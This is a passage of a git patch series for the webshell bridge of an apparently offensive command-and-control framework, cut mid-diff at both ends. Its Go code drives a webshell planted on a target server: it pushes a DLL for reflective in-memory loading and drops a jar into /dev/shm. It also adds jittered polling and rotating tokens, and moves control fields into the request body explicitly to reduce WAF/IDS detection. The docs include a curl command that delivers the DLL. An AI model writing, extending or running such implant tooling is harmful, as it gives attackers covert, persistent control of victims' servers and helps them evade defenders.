func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { if c.closed.Load() { @@ -236,7 +321,7 @@ func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { return err } - c.dispatchResponse(respBody) + _ = c.dispatchResponse(respBody) return nil } @@ -286,7 +371,7 @@ func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]b } req.Header.Set(headerStage, stage) if c.token != "" { - req.Header.Set(headerToken, c.token) + req.Header.Set(headerToken, tokenForHeader(c.token)) } if c.sidSet.Load() { req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) @@ -307,18 +392,21 @@ func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]b return io.ReadAll(resp.Body) } -func (c *Channel) dispatchResponse(body []byte) { +func (c *Channel) dispatchResponse(body []byte) bool { if len(body) == 0 { - return + return false } spites := &implantpb.Spites{} if err := proto.Unmarshal(body, spites); err != nil { logs.Log.Debugf("dispatch unmarshal error: %v", err) - return + return false } + dispatched := false for _, spite := range spites.GetSpites() { c.dispatchSpite(spite) + dispatched = true } + return dispatched } func (c *Channel) dispatchSpite(spite *implantpb.Spite) { @@ -334,3 +422,16 @@ func (c *Channel) dispatchSpite(spite *implantpb.Spite) { } } } + +// tokenForHeader returns the token value to send in the X-Token header. +// Short secrets (≤32 chars) are sent as-is (legacy static comparison on the webshell). +// Longer secrets use time-based HMAC-SHA256 that rotates every 30 seconds. 
+func tokenForHeader(secret string) string { + if len(secret) <= 32 { + return secret + } + window := time.Now().Unix() / 30 + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, window) + return hex.EncodeToString(mac.Sum(nil)) +} diff --git a/server/cmd/webshell-bridge/channel_test.go b/server/cmd/webshell-bridge/channel_test.go index 1563b84a..50d98ba1 100644 --- a/server/cmd/webshell-bridge/channel_test.go +++ b/server/cmd/webshell-bridge/channel_test.go @@ -1,7 +1,10 @@ package main import ( + "crypto/hmac" + "crypto/sha256" "encoding/binary" + "encoding/hex" "io" "net/http" "net/http/httptest" @@ -267,3 +270,63 @@ func TestChannelStreamDispatch(t *testing.T) { ch.CloseStream(100) } + +func TestComputeHMAC(t *testing.T) { + secret := "test-secret-token-longer-than-32chars" + token := tokenForHeader(secret) + + // Token should be a 64-char hex string (SHA-256) + if len(token) != 64 { + t.Fatalf("expected 64 hex chars, got %d", len(token)) + } + if _, err := hex.DecodeString(token); err != nil { + t.Fatalf("token is not valid hex: %v", err) + } + + // Same call within the same 30s window should produce the same token + token2 := tokenForHeader(secret) + if token != token2 { + t.Error("same-window HMAC should be identical") + } + + // Different secret should produce different token + token3 := tokenForHeader("different-secret-also-longer-than32") + if token == token3 { + t.Error("different secrets should produce different tokens") + } +} + +func TestHMACWindowTolerance(t *testing.T) { + secret := "test-secret-token-longer-than-32chars" + now := time.Now().Unix() / 30 + + // Verify that the token matches one of the valid windows (current ±1) + token := tokenForHeader(secret) + + matched := false + for w := now - 1; w <= now+1; w++ { + mac := hmac.New(sha256.New, []byte(secret)) + _ = binary.Write(mac, binary.BigEndian, w) + expected := hex.EncodeToString(mac.Sum(nil)) + if expected == token { + matched = true + break + } + } + if 
!matched { + t.Error("HMAC token did not match any valid time window") + } +} + +func TestJitterRange(t *testing.T) { + base := 1 * time.Second + minExpected := time.Duration(float64(base) * (1 - jitterFactor)) + maxExpected := time.Duration(float64(base) * (1 + jitterFactor)) + + for i := 0; i < 100; i++ { + j := jitter(base) + if j < minExpected || j > maxExpected { + t.Fatalf("jitter out of range: got %v, expected [%v, %v]", j, minExpected, maxExpected) + } + } +} diff --git a/server/cmd/webshell-bridge/config.go b/server/cmd/webshell-bridge/config.go index 0775a376..293a0a7b 100644 --- a/server/cmd/webshell-bridge/config.go +++ b/server/cmd/webshell-bridge/config.go @@ -9,6 +9,7 @@ type Config struct { PipelineName string // pipeline name Suo5URL string // suo5 webshell URL (e.g. suo5://target/suo5.jsp) StageToken string // auth token for X-Stage requests (must match webshell's STAGE_TOKEN) + DLLPath string // optional path to bridge DLL for auto-loading Debug bool // enable debug logging } diff --git a/server/cmd/webshell-bridge/main.go b/server/cmd/webshell-bridge/main.go index 62eb1232..5214142b 100644 --- a/server/cmd/webshell-bridge/main.go +++ b/server/cmd/webshell-bridge/main.go @@ -20,6 +20,7 @@ func main() { flag.StringVar(&cfg.PipelineName, "pipeline", "", "pipeline name (auto-generated if empty)") flag.StringVar(&cfg.Suo5URL, "suo5", "", "suo5 webshell URL (e.g. 
suo5://target/suo5.jsp)") flag.StringVar(&cfg.StageToken, "token", "", "auth token matching webshell's STAGE_TOKEN") + flag.StringVar(&cfg.DLLPath, "dll", "", "path to bridge DLL for auto-loading (optional)") flag.BoolVar(&cfg.Debug, "debug", false, "enable debug logging") flag.Parse() From b3c3f2fbaab12ff3058033b3789ff77229bb5109 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:18 +0800 Subject: [PATCH 10/19] docs(protocol): add DLL auto-load usage and manual loading section --- docs/protocol/webshell-bridge.md | 19 ++++++++++++------- 1 file changed, 12 insertions(+), 7 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index b1ac7eb0..7d2580d3 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -75,7 +75,11 @@ Client exec("whoami") ## Usage -### 1. Build and run bridge binary +### 1. Deploy webshell + +Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server. + +### 2. Build and run bridge binary ```bash go build -o webshell-bridge ./server/cmd/webshell-bridge/ @@ -84,22 +88,25 @@ webshell-bridge \ --auth listener.auth \ --suo5 suo5://target.com/suo5.aspx \ --listener my-listener \ - --token CHANGE_ME_RANDOM_TOKEN + --token CHANGE_ME_RANDOM_TOKEN \ + --dll bridge.dll ``` The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). +The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). + At startup the bridge registers the listener, opens `JobStream`, and waits for pipeline control messages. -### 2. Register and start the pipeline from Client/TUI +### 3. 
Register and start the pipeline from Client/TUI ``` webshell new --listener my-listener ``` -### 3. Deploy webshell + load bridge DLL +The bridge receives the start event, auto-loads the DLL (if `--dll` was provided), establishes the session, and the operator can interact immediately. -Deploy the suo5 webshell (JSP/PHP/ASPX) to the target web server, then send the bridge DLL: +**Manual DLL loading** (only needed if `--dll` is not set): ```bash curl -X POST \ @@ -109,8 +116,6 @@ curl -X POST \ http://target.com/suo5.aspx ``` -The webshell loads the DLL via ReflectiveLoader, then resolves `bridge_init`/`bridge_process` exports from the mapped PE image. If the DLL is not loaded when the pipeline starts, the bridge retries with exponential backoff. - ### 4. Interact ``` From 17acc8e3deac4661ab4fce6ef1ecad1ecbcb6953 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Sun, 22 Mar 2026 19:09:38 +0800 Subject: [PATCH 11/19] feat(webshell-bridge): add pipelinectl debug utility CLI tool for listing, registering, starting and stopping webshell pipelines directly via the admin RPC, useful for development and debugging without the full client TUI. 
--- .../cmd/webshell-bridge/pipelinectl/main.go | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 server/cmd/webshell-bridge/pipelinectl/main.go diff --git a/server/cmd/webshell-bridge/pipelinectl/main.go b/server/cmd/webshell-bridge/pipelinectl/main.go new file mode 100644 index 00000000..f40cca95 --- /dev/null +++ b/server/cmd/webshell-bridge/pipelinectl/main.go @@ -0,0 +1,98 @@ +package main + +import ( + "context" + "flag" + "fmt" + "log" + + "github.com/chainreactors/IoM-go/client" + "github.com/chainreactors/IoM-go/mtls" + "github.com/chainreactors/IoM-go/proto/client/clientpb" +) + +func main() { + authFile := flag.String("auth", "", "path to admin.auth file") + action := flag.String("action", "start", "action: list, register, start, stop") + listenerID := flag.String("listener", "webshell-listener", "listener ID") + pipelineName := flag.String("pipeline", "webshell_webshell-listener", "pipeline name") + pipelineType := flag.String("type", "webshell", "pipeline type") + flag.Parse() + + if *authFile == "" { + log.Fatal("--auth is required") + } + + config, err := mtls.ReadConfig(*authFile) + if err != nil { + log.Fatalf("read config: %v", err) + } + + conn, err := mtls.Connect(config) + if err != nil { + log.Fatalf("connect: %v", err) + } + defer conn.Close() + + server, err := client.NewServerStatus(conn, config) + if err != nil { + log.Fatalf("init server: %v", err) + } + + switch *action { + case "list": + listeners, err := server.Rpc.GetListeners(context.Background(), &clientpb.Empty{}) + if err != nil { + log.Fatalf("get listeners: %v", err) + } + for _, l := range listeners.Listeners { + fmt.Printf("Listener: %s IP: %s Active: %v\n", l.Id, l.Ip, l.Active) + if l.Pipelines != nil { + for _, p := range l.Pipelines.Pipelines { + fmt.Printf(" Pipeline: %s Enable: %v\n", p.Name, p.Enable) + } + } + } + + case "register": + fmt.Printf("Registering pipeline %s (type=%s) on listener %s\n", *pipelineName, *pipelineType, *listenerID) + 
_, err := server.Rpc.RegisterPipeline(context.Background(), &clientpb.Pipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + Type: *pipelineType, + Enable: true, + Body: &clientpb.Pipeline_Tcp{ + Tcp: &clientpb.TCPPipeline{ + Host: "127.0.0.1", + Port: 0, + }, + }, + }) + if err != nil { + log.Fatalf("register pipeline: %v", err) + } + fmt.Println("Pipeline registered!") + + case "start": + fmt.Printf("Starting pipeline %s on listener %s\n", *pipelineName, *listenerID) + _, err := server.Rpc.StartPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + }) + if err != nil { + log.Fatalf("start pipeline: %v", err) + } + fmt.Println("Pipeline started!") + + case "stop": + fmt.Printf("Stopping pipeline %s on listener %s\n", *pipelineName, *listenerID) + _, err := server.Rpc.StopPipeline(context.Background(), &clientpb.CtrlPipeline{ + Name: *pipelineName, + ListenerId: *listenerID, + }) + if err != nil { + log.Fatalf("stop pipeline: %v", err) + } + fmt.Println("Pipeline stopped!") + } +} From 5702b46a76fa7b5ad48cee7697869ef0a5a81e52 Mon Sep 17 00:00:00 2001 From: wuchulonly <1746825356@qq.com> Date: Mon, 23 Mar 2026 02:05:05 +0800 Subject: [PATCH 12/19] feat(webshell-bridge): add deps delivery, streaming and URL refactor - Add dependency jar delivery (e.g., jna.jar) before DLL loading for JSP targets - Add response streaming support with length-prefixed frames and fallback - Replace suo5:// URL scheme with direct HTTP(S) URL - Add structured JSON status response alongside legacy text format - Expand test coverage for new channel features --- docs/protocol/webshell-bridge.md | 8 +- server/cmd/webshell-bridge/bridge.go | 50 ++- server/cmd/webshell-bridge/channel.go | 338 +++++++++++------ server/cmd/webshell-bridge/channel_test.go | 403 ++++++++++++++++++++- server/cmd/webshell-bridge/config.go | 17 +- server/cmd/webshell-bridge/main.go | 7 +- server/cmd/webshell-bridge/session.go | 2 +- 7 files changed, 691 
insertions(+), 134 deletions(-) diff --git a/docs/protocol/webshell-bridge.md b/docs/protocol/webshell-bridge.md index 7d2580d3..9028b8fe 100644 --- a/docs/protocol/webshell-bridge.md +++ b/docs/protocol/webshell-bridge.md @@ -86,13 +86,13 @@ go build -o webshell-bridge ./server/cmd/webshell-bridge/ webshell-bridge \ --auth listener.auth \ - --suo5 suo5://target.com/suo5.aspx \ + --url http://target.com/suo5.aspx \ --listener my-listener \ --token CHANGE_ME_RANDOM_TOKEN \ --dll bridge.dll ``` -The `--token` must match the `STAGE_TOKEN` constant in the webshell. The suo5 URL is converted to HTTP(S) automatically (`suo5://` → `http://`, `suo5s://` → `https://`). +The `--token` must match the `STAGE_TOKEN` constant in the webshell. Use the full HTTP(S) URL of the deployed webshell. The `--dll` flag enables auto-loading: when the pipeline starts, the bridge automatically delivers the DLL to the webshell via `X-Stage: load` if it is not already loaded. If `--dll` is omitted, you must load the DLL manually (see below). @@ -132,9 +132,11 @@ download /remote/file | Stage | Method | Description | |-------|--------|-------------| | `load` | POST | Load bridge DLL into memory (body = raw DLL bytes) | -| `status` | POST | Check if DLL is loaded (returns `LOADED` or `NOT_LOADED`) | +| `deps` | POST | Deliver dependency file (e.g., jna.jar) with `X-Dep-Name` header | +| `status` | POST | Check if DLL is loaded (returns JSON `{"ready":true,...}` or legacy `LOADED`/`NOT_LOADED`) | | `init` | POST | Get Register data from `bridge_init()` (returns `[4B sessionID LE][Register protobuf]`) | | `spite` | POST | Process Spites via `bridge_process()` (body/response = serialized `Spites` protobuf) | +| `stream` | POST | Long-lived response stream (length-prefixed frames, falls back to `spite` polling if unsupported) | All stage requests require `X-Token` header matching `STAGE_TOKEN`. 
diff --git a/server/cmd/webshell-bridge/bridge.go b/server/cmd/webshell-bridge/bridge.go index 02889c81..389c1cb4 100644 --- a/server/cmd/webshell-bridge/bridge.go +++ b/server/cmd/webshell-bridge/bridge.go @@ -6,7 +6,9 @@ import ( "fmt" "io" "os" + "path/filepath" "strconv" + "strings" "sync" "time" @@ -33,7 +35,7 @@ const ( ) // Bridge is the WebShell bridge that connects to the IoM server via -// ListenerRPC and manages webshell-backed sessions through a suo5 tunnel. +// ListenerRPC and manages webshell-backed sessions through HTTP endpoints. // // The bridge owns the listener runtime only. Custom pipelines are created and // controlled through pipeline start/stop events from the server. @@ -127,6 +129,7 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } dllDelivered := false + depsDelivered := false delay := retryBaseDelay for attempt := 1; attempt <= retryMaxAttempts; attempt++ { select { @@ -136,6 +139,26 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error } if err := channel.Connect(ctx); err != nil { + // Deliver dependency jars (e.g., jna.jar) before DLL load. + // JSP needs jna.jar for JNA resolution during DLL loading, + // so deps must be present before the DLL can be reflectively loaded. + if b.cfg.DepsDir != "" && !depsDelivered { + needDeps := true + if channel.lastStatus != nil && channel.lastStatus.DepsPresent { + needDeps = false + logs.Log.Debug("deps already present on target, skipping delivery") + depsDelivered = true + } + if needDeps { + logs.Log.Important("delivering dependency jars before DLL load") + if depErr := b.deliverDeps(ctx, channel); depErr != nil { + logs.Log.Warnf("deps delivery failed (attempt %d/%d): %v", attempt, retryMaxAttempts, depErr) + } else { + depsDelivered = true + } + } + } + // Auto-load DLL if we have it and haven't delivered yet. 
if dllBytes != nil && !dllDelivered { logs.Log.Importantf("DLL not loaded, delivering via X-Stage: load (%d bytes)", len(dllBytes)) @@ -183,6 +206,31 @@ func (b *Bridge) connectDLL(ctx context.Context, runtime *pipelineRuntime) error return nil } +// deliverDeps uploads dependency jars from --deps directory to the webshell. +// Files matching *.jar are sent with fixed name ".jna.jar" to /dev/shm on target. +func (b *Bridge) deliverDeps(ctx context.Context, channel *Channel) error { + entries, err := os.ReadDir(b.cfg.DepsDir) + if err != nil { + return fmt.Errorf("read deps dir %s: %w", b.cfg.DepsDir, err) + } + for _, entry := range entries { + if entry.IsDir() || !strings.HasSuffix(strings.ToLower(entry.Name()), ".jar") { + continue + } + data, err := os.ReadFile(filepath.Join(b.cfg.DepsDir, entry.Name())) + if err != nil { + return fmt.Errorf("read dep %s: %w", entry.Name(), err) + } + // Fixed name: JSP expects .jna.jar at /dev/shm + if err := channel.DeliverDep(ctx, ".jna.jar", data); err != nil { + return fmt.Errorf("deliver %s as .jna.jar: %w", entry.Name(), err) + } + logs.Log.Importantf("delivered %s as .jna.jar (%d bytes)", entry.Name(), len(data)) + break // only deliver one jar + } + return nil +} + // connect establishes the mTLS gRPC connection to the server. 
func (b *Bridge) connect(ctx context.Context) error { authCfg, err := mtls.ReadConfig(b.cfg.AuthFile) diff --git a/server/cmd/webshell-bridge/channel.go b/server/cmd/webshell-bridge/channel.go index c927bfb3..4bf4172d 100644 --- a/server/cmd/webshell-bridge/channel.go +++ b/server/cmd/webshell-bridge/channel.go @@ -8,11 +8,12 @@ import ( "crypto/tls" "encoding/binary" "encoding/hex" + "encoding/json" "fmt" "io" "math/rand" "net/http" - "strconv" + "strings" "sync" "sync/atomic" "time" @@ -24,20 +25,25 @@ import ( ) const ( - httpTimeout = 30 * time.Second - longPollTimeout = 10 * time.Second - pollIdleInterval = 5 * time.Second - pollActiveInterval = 200 * time.Millisecond - jitterFactor = 0.3 - streamChanBuffer = 16 - stageLoad = "load" - stageInit = "init" - stageSpite = "spite" - stageStatus = "status" - headerStage = "X-Stage" - headerToken = "X-Token" - headerSessionID = "X-Session-ID" - headerPollTimeout = "X-Poll-Timeout" + httpTimeout = 30 * time.Second + longPollTimeout = 10 * time.Second + pollIdleInterval = 5 * time.Second + pollActiveInterval = 200 * time.Millisecond + jitterFactor = 0.3 + streamChanBuffer = 16 + streamReconnectDelay = 2 * time.Second + streamMaxReconnect = 5 + streamFrameMaxSize = 10 * 1024 * 1024 // 10MB sanity limit +) + +// Stage codes encoded in body envelope (no HTTP headers). +const ( + stageLoad byte = 0x01 + stageStatus byte = 0x02 + stageInit byte = 0x03 + stageSpite byte = 0x04 + stageStream byte = 0x05 + stageDeps byte = 0x06 ) // ChannelIface abstracts the communication channel to the bridge DLL. @@ -56,33 +62,43 @@ type ChannelIface interface { IsClosed() bool } -// Channel communicates with the bridge DLL through HTTP POST requests -// to the webshell's X-Stage endpoints. The webshell calls DLL exports -// (bridge_init, bridge_process) directly via function pointers — no TCP -// port opened on the target, pure memory channel. +// Channel communicates with the bridge DLL through HTTP POST requests. 
+// All control information (stage, token, session ID) is encoded in a body +// envelope prefix — no custom HTTP headers, reducing WAF/IDS fingerprint. +// +// Body envelope format: // -// Wire format: raw protobuf over HTTP body. +// [1B stage][4B sessionID LE][1B token_len][token bytes][payload...] // -// For streaming tasks, a background poll goroutine periodically sends -// empty requests to collect pending responses from the DLL. +// Payload is stage-specific: +// - load: raw DLL bytes +// - status: empty +// - init: empty +// - spite: Spites protobuf +// - stream: empty +// - deps: [1B dep_name_len][dep_name][jar bytes] type Channel struct { - webshellURL string - token string - client *http.Client + webshellURL string + token string + client *http.Client + streamClient *http.Client // no timeout, for long-lived stream connection sid uint32 sidSet atomic.Bool closed atomic.Bool closeCh chan struct{} + lastStatus *StatusResponse // populated by Connect() + streamSupported atomic.Bool + pendMu sync.Mutex pending map[uint32]chan *implantpb.Spite - pollCancel context.CancelFunc + recvCancel context.CancelFunc } // NewChannel creates a channel that communicates with the DLL through -// the webshell's X-Stage: spite HTTP endpoint. +// the webshell's body-envelope HTTP endpoint. func NewChannel(webshellURL, token string) *Channel { return &Channel{ webshellURL: webshellURL, @@ -93,20 +109,66 @@ func NewChannel(webshellURL, token string) *Channel { TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, }, }, + streamClient: &http.Client{ + Timeout: 0, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{InsecureSkipVerify: true}, + }, + }, pending: make(map[uint32]chan *implantpb.Spite), closeCh: make(chan struct{}), } } +// StatusResponse is the structured status returned by the webshell. 
+type StatusResponse struct { + Ready bool `json:"ready"` + Method string `json:"method"` + DepsPresent bool `json:"deps_present"` + BridgeVersion string `json:"bridge_version"` +} + +// buildEnvelope constructs the body prefix: [1B stage][4B sid LE][1B token_len][token]. +func (c *Channel) buildEnvelope(stage byte, payload []byte) []byte { + tok := computeToken(c.token) + tokLen := len(tok) + if tokLen > 255 { + tokLen = 255 + tok = tok[:255] + } + + // envelope header: 1 + 4 + 1 + tokLen + hdrLen := 6 + tokLen + buf := make([]byte, hdrLen+len(payload)) + buf[0] = stage + binary.LittleEndian.PutUint32(buf[1:5], c.sid) + buf[5] = byte(tokLen) + copy(buf[6:6+tokLen], tok) + copy(buf[hdrLen:], payload) + return buf +} + // Connect verifies the webshell is reachable and the DLL is loaded. func (c *Channel) Connect(ctx context.Context) error { body, err := c.doRequest(ctx, stageStatus, nil) if err != nil { return fmt.Errorf("connect: %w", err) } - status := string(body) - if status != "LOADED" { - return fmt.Errorf("DLL not loaded (status: %s)", status) + text := strings.TrimSpace(string(body)) + + if len(text) > 0 && text[0] == '{' { + var sr StatusResponse + if jsonErr := json.Unmarshal([]byte(text), &sr); jsonErr == nil { + c.lastStatus = &sr + if !sr.Ready { + return fmt.Errorf("DLL not loaded (status: %s)", text) + } + return nil + } + } + + if text != "LOADED" { + return fmt.Errorf("DLL not loaded (status: %s)", text) } return nil } @@ -120,6 +182,26 @@ func (c *Channel) LoadDLL(ctx context.Context, dllBytes []byte) error { return nil } +// DeliverDep sends a dependency file (e.g., jna.jar) to the webshell. +// Payload format for deps stage: [1B dep_name_len][dep_name][jar bytes]. 
+func (c *Channel) DeliverDep(ctx context.Context, depName string, data []byte) error { + nameBytes := []byte(depName) + if len(nameBytes) > 255 { + nameBytes = nameBytes[:255] + } + payload := make([]byte, 1+len(nameBytes)+len(data)) + payload[0] = byte(len(nameBytes)) + copy(payload[1:1+len(nameBytes)], nameBytes) + copy(payload[1+len(nameBytes):], data) + + respBody, err := c.doRequest(ctx, stageDeps, payload) + if err != nil { + return fmt.Errorf("deliver dep %s: %w", depName, err) + } + logs.Log.Debugf("dep delivered: %s -> %s", depName, strings.TrimSpace(string(respBody))) + return nil +} + // Handshake calls bridge_init on the DLL via the webshell and returns // the Register message containing SysInfo and module list. func (c *Channel) Handshake() (*implantpb.Register, error) { @@ -127,15 +209,11 @@ func (c *Channel) Handshake() (*implantpb.Register, error) { if err != nil { return nil, fmt.Errorf("handshake: %w", err) } - if len(body) == 0 { - return nil, fmt.Errorf("empty handshake response") - } - - // First 4 bytes: session ID (little-endian uint32), rest: Register protobuf if len(body) < 4 { return nil, fmt.Errorf("handshake response too short: %d bytes", len(body)) } - c.sid = uint32(body[0]) | uint32(body[1])<<8 | uint32(body[2])<<16 | uint32(body[3])<<24 + + c.sid = binary.LittleEndian.Uint32(body[:4]) c.sidSet.Store(true) reg := &implantpb.Register{} @@ -147,12 +225,106 @@ func (c *Channel) Handshake() (*implantpb.Register, error) { return reg, nil } -// StartRecvLoop starts a background polling goroutine that fetches pending -// responses from the DLL for streaming tasks. +// StartRecvLoop starts the background receive loop. It tries StreamHTTP first +// (long-lived HTTP response stream) and falls back to polling if unsupported. 
func (c *Channel) StartRecvLoop() { ctx, cancel := context.WithCancel(context.Background()) - c.pollCancel = cancel - go c.pollLoop(ctx) + c.recvCancel = cancel + go c.recvLoop(ctx) +} + +func (c *Channel) recvLoop(ctx context.Context) { + if c.tryStreamLoop(ctx) { + for attempt := 1; attempt <= streamMaxReconnect; attempt++ { + select { + case <-ctx.Done(): + return + case <-c.closeCh: + return + case <-time.After(jitter(streamReconnectDelay)): + } + if c.tryStreamLoop(ctx) { + attempt = 0 + } + } + logs.Log.Warn("stream reconnect exhausted, falling back to poll mode") + } + logs.Log.Debug("using poll mode for streaming tasks") + c.pollLoop(ctx) +} + +// tryStreamLoop opens a long-lived POST with stage=stream envelope and reads +// length-prefixed frames from the response body. +func (c *Channel) tryStreamLoop(ctx context.Context) bool { + envelope := c.buildEnvelope(stageStream, nil) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) + if err != nil { + logs.Log.Debugf("stream: request create error: %v", err) + return false + } + req.Header.Set("Content-Type", "application/octet-stream") + + resp, err := c.streamClient.Do(req) + if err != nil { + logs.Log.Debugf("stream: connection error: %v", err) + return false + } + defer resp.Body.Close() + + if resp.StatusCode != http.StatusOK { + logs.Log.Debugf("stream: HTTP %d, not supported", resp.StatusCode) + return false + } + + c.streamSupported.Store(true) + logs.Log.Important("stream mode active") + + if err := c.readStreamFrames(ctx, resp.Body); err != nil { + if ctx.Err() != nil { + return true + } + logs.Log.Debugf("stream: read error: %v", err) + } + return true +} + +func (c *Channel) readStreamFrames(ctx context.Context, r io.Reader) error { + for { + select { + case <-ctx.Done(): + return ctx.Err() + case <-c.closeCh: + return nil + default: + } + + data, err := readFrame(r) + if err != nil { + return err + } + if len(data) > 0 { + c.dispatchResponse(data) + } + } 
+} + +func readFrame(r io.Reader) ([]byte, error) { + var lenBuf [4]byte + if _, err := io.ReadFull(r, lenBuf[:]); err != nil { + return nil, err + } + frameLen := binary.BigEndian.Uint32(lenBuf[:]) + if frameLen == 0 { + return nil, nil + } + if frameLen > streamFrameMaxSize { + return nil, fmt.Errorf("frame too large: %d bytes", frameLen) + } + payload := make([]byte, frameLen) + if _, err := io.ReadFull(r, payload); err != nil { + return nil, err + } + return payload, nil } func (c *Channel) pollLoop(ctx context.Context) { @@ -162,7 +334,6 @@ func (c *Channel) pollLoop(ctx context.Context) { c.pendMu.Unlock() if !hasPending { - // No active streaming tasks — idle wait, no HTTP request. select { case <-ctx.Done(): return @@ -173,13 +344,12 @@ func (c *Channel) pollLoop(ctx context.Context) { continue } - // Active streaming tasks — send long-poll request with timeout hint. empty := &implantpb.Spites{} data, err := proto.Marshal(empty) if err != nil { continue } - respBody, err := c.doLongPollRequest(ctx, data) + respBody, err := c.doRequest(ctx, stageSpite, data) if err != nil { if ctx.Err() != nil { return @@ -197,7 +367,6 @@ func (c *Channel) pollLoop(ctx context.Context) { hasData := c.dispatchResponse(respBody) - // Adaptive interval: fast when data is flowing, slow down when idle. var interval time.Duration if hasData { interval = pollActiveInterval @@ -214,48 +383,6 @@ func (c *Channel) pollLoop(ctx context.Context) { } } -// doLongPollRequest sends a spite-stage request with X-Poll-Timeout header, -// telling the webshell to hold the connection until data is available or timeout. 
-func (c *Channel) doLongPollRequest(ctx context.Context, body []byte) ([]byte, error) { - var bodyReader io.Reader - if body != nil { - bodyReader = bytes.NewReader(body) - } - - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) - if err != nil { - return nil, err - } - req.Header.Set(headerStage, stageSpite) - req.Header.Set(headerPollTimeout, strconv.Itoa(int(longPollTimeout.Seconds()))) - if c.token != "" { - req.Header.Set(headerToken, tokenForHeader(c.token)) - } - if c.sidSet.Load() { - req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) - } - req.Header.Set("Content-Type", "application/octet-stream") - - resp, err := c.client.Do(req) - if err != nil { - return nil, err - } - defer resp.Body.Close() - - if resp.StatusCode != http.StatusOK { - respBody, _ := io.ReadAll(resp.Body) - return nil, fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody)) - } - - return io.ReadAll(resp.Body) -} - -// jitter adds ±jitterFactor random variation to an interval. -func jitter(d time.Duration) time.Duration { - delta := float64(d) * jitterFactor - return d + time.Duration(delta*(2*rand.Float64()-1)) -} - // Forward sends a Spite and waits for a single response (unary request-response). func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spite, error) { if c.closed.Load() { @@ -294,7 +421,6 @@ func (c *Channel) Forward(taskID uint32, spite *implantpb.Spite) (*implantpb.Spi return nil, fmt.Errorf("no response for task %d", taskID) } -// OpenStream registers a persistent response channel for streaming tasks. func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { ch := make(chan *implantpb.Spite, streamChanBuffer) c.pendMu.Lock() @@ -303,7 +429,6 @@ func (c *Channel) OpenStream(taskID uint32) <-chan *implantpb.Spite { return ch } -// SendSpite sends a spite to the DLL via the webshell. 
func (c *Channel) SendSpite(taskID uint32, spite *implantpb.Spite) error { if c.closed.Load() { return fmt.Errorf("channel closed") @@ -344,7 +469,6 @@ func (c *Channel) SessionID() uint32 { return c.sid } func (c *Channel) IsClosed() bool { return c.closed.Load() } -// WithSecure is a no-op. Use HTTPS for transport security. func (c *Channel) WithSecure(_ *clientpb.KeyPair) {} func (c *Channel) Close() error { @@ -352,30 +476,21 @@ func (c *Channel) Close() error { return nil } close(c.closeCh) - if c.pollCancel != nil { - c.pollCancel() + if c.recvCancel != nil { + c.recvCancel() } c.CloseAllStreams() return nil } -func (c *Channel) doRequest(ctx context.Context, stage string, body []byte) ([]byte, error) { - var bodyReader io.Reader - if body != nil { - bodyReader = bytes.NewReader(body) - } +// doRequest sends a POST with body envelope, no custom headers. +func (c *Channel) doRequest(ctx context.Context, stage byte, payload []byte) ([]byte, error) { + envelope := c.buildEnvelope(stage, payload) - req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bodyReader) + req, err := http.NewRequestWithContext(ctx, "POST", c.webshellURL, bytes.NewReader(envelope)) if err != nil { return nil, err } - req.Header.Set(headerStage, stage) - if c.token != "" { - req.Header.Set(headerToken, tokenForHeader(c.token)) - } - if c.sidSet.Load() { - req.Header.Set(headerSessionID, fmt.Sprintf("%d", c.sid)) - } req.Header.Set("Content-Type", "application/octet-stream") resp, err := c.client.Do(req) @@ -423,10 +538,19 @@ func (c *Channel) dispatchSpite(spite *implantpb.Spite) { } } -// tokenForHeader returns the token value to send in the X-Token header. -// Short secrets (≤32 chars) are sent as-is (legacy static comparison on the webshell). +// jitter adds ±jitterFactor random variation to an interval. 
